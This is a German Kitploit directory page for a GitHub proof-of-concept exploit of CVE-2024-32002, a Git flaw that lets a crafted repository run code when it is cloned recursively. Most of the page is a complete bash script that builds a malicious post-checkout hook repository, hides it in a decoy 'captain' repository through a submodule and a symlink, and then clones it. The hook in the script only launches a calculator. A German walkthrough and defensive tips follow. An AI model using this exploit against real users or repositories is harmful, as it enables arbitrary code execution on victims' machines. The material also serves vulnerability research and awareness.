Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-32002-poc — CVE-2024-32002 ist eine schwerwiegende Sicherheitslücke in Git, die es einem Angreifer ermöglicht, beim Ausführen eines git clone-Vorgangs durch den Benutzer beliebigen Code remote auszuführen (RCE). | Kitploit
Tools/GitHubGitHub/bohemianhacks/cve-2024-32002-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubbohemianhacks/cve-2024-32002-poc

CVE-2024-32002-poc

CVE-2024-32002 ist eine schwerwiegende Sicherheitslücke in Git, die es einem Angreifer ermöglicht, beim Ausführen eines git clone-Vorgangs durch den Benutzer beliebigen Code remote auszuführen (RCE).

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Bash-Skript:

root@kitploit:~
#!/bin/bash

# Set Git configuration options
git config --global protocol.file.allow always
git config --global core.symlinks true
# Avoid warning messages (set default branch to main)
git config --global init.defaultBranch main 

# Define tell-tale path
tell_tale_path="$PWD/tell.tale"

# Initialize hook repository
git init hook
cd hook
mkdir -p y/hooks

# Write malicious code to hook, compatible with Windows and macOS
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
calc.exe
open -a Calculator.app
EOF

# Make hook executable: important
chmod +x y/hooks/post-checkout

git add y/hooks/post-checkout
git commit -m "post-checkout"

cd ..

# Define hook repository path
hook_repo_path="$(pwd)/hook"

# Initialize captain repository
git init captain
cd captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m "add-submodule"

# Create symbolic link
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
cd ..

# Local testing (not needed for GitHub)
git clone --recursive captain hooked

Einfache Erklärung auf Deutsch:

Dieses Bash-Skript erstellt ein bösartiges Git-Repository, das eine Schwachstelle (CVE-2024-32002) ausnutzt, um beim Klonen des Repositories schädlichen Code auszuführen.

Hier eine Aufschlüsselung, was das Skript tut:

  1. Git-Konfiguration einrichten: Aktiviert bestimmte Funktionen, die für den Angriff benötigt werden.
  2. Bösartiges Hook-Repository erstellen: Dieses Repository enthält ein verstecktes Skript, das ausgeführt wird, wenn jemand es klont.
  3. Täuschendes Repository erstellen: Dieses Repository mit dem Namen „captain“ wirkt harmlos, enthält aber heimlich das bösartige Hook-Repository als Submodul.
  4. Symbolischen Link hinzufügen: Diese Täuschung dient dazu, den bösartigen Hook zu verstecken und dafür zu sorgen, dass er beim Klonen des Repositories ausgeführt wird.

Wenn jemand das „captain“-Repository klont, wird das bösartige Skript auf seinem Computer ausgeführt, was zu gefährlichen Konsequenzen führen kann, wie:

  • Installation von Schadsoftware: Das Skript könnte schädliche Software herunterladen und installieren.
  • Datendiebstahl: Es könnte vertrauliche Informationen vom Computer des Opfers stehlen.
  • Systemkompromittierung: Das Skript könnte unbefugten Zugriff auf das System erlangen.

Um sich vor solchen Angriffen zu schützen:

  • Halten Sie Ihren Git-Client auf dem neuesten Stand: Stellen Sie sicher, dass Sie die aktuellste Version verwenden, um Schwachstellen zu beheben.
  • Seien Sie vorsichtig beim Klonen von Repositories: Klonen Sie nur Repositories von vertrauenswürdigen Quellen.
  • Verwenden Sie ein seriöses Antivirenprogramm: Dies kann helfen, schädliche Software zu erkennen und zu blockieren.
  • Achten Sie auf Phishing-Angriffe: Klicken Sie nicht auf verdächtige Links und laden Sie keine Dateien von unbekannten Quellen herunter.

Wenn Sie diese Vorsichtsmaßnahmen befolgen, können Sie das Risiko, Opfer ähnlicher Angriffe zu werden, erheblich verringern.

Tool herunterladen